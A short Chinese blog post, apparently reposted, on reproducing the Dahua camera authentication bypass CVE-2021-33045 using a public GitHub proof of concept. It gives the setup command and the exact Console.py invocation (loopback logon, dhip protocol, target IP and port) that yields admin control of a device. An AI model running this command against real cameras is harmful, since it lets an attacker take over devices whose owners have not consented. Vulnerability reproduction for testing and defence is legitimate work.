2021年10月,大华多款摄像产品曝光了认证绕过漏洞,攻击者可利用该漏洞绕过身份验证,获得设备管理权限,可对摄像头进行配置修改、获取配置信息、修改口令、重启设备、添加用户等,危害很高,影响IPC/VTH/VTO/NVR/DVR等主流产品
复现方式
最好是使用kali,用windows验证时python的包老是出错
下载POC(github有),利用POC压缩包中的requirements.txt
搭建环境:
sudo pip3 install -r requirements.txt
运行Console.py
,登陆方式选择loopback
,协议选择dhip
,端口为摄像头的web管理端口(通常为80):文章来源:https://www.toymoban.com/news/detail-626176.html
python ./Console.py --logon loopback --rhost IP --proto dhip --rport port
文章来源地址https://www.toymoban.com/news/detail-626176.html
到了这里,关于Dahua IPC 授权问题漏洞(CVE-2021-33045)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!